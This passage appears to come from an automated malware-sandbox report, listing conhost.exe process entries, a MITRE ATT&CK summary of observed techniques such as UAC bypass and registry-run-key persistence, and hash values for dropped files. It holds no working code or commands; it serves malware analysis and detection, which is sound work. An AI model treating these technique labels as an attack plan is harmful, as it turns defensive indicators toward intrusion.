C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1958419288676027462505550483-1787620150133642223-787073684813512879889944081"1⤵PID:2140
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-819555644-15303328178600602291755182339-9294407984901380711000409103-415890403"1⤵PID:1564
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2379549201174109886-66061726-19980820411345001851610039256-1403470178-764686109"1⤵PID:1880
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3JavaScript
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Power Settings
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD582f229d0c36b68073da70ef5958e425d
SHA12beb8cd227b49b1d119165d6e3d258ddb730387a
SHA2560f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394
SHA5124553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970
-
Filesize
27KB
MD5238ec4d17050e1841e8e0171407c2260
SHA12c8c14b257641f1e1151c6303dabde01621314f2
SHA256163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb
SHA5123eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f49bfdbbedc1cfa82bcc1c67cfe861a8
SHA1e458cf588723d69228f137495ef1c228e6771254
SHA256eda1aa8396a266834e3713eea72b246f534124a79160128b9a0141d2a16a5eaf
SHA512a095098a47a7b18678d6e8195481e47dd02bb1aa835121f3d3f18ace12273f90f2766e63bbfd1b6118e648e6fe72df47f45bac7b7cd6f60e1af359bf718c33de
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
7.3MB
MD5c9e6aa21979d5fc710f1f2e8226d9dfe
SHA1d881f97a1fe03f43bed2a9609eae65531cf710cf
SHA256a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d
SHA5129e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627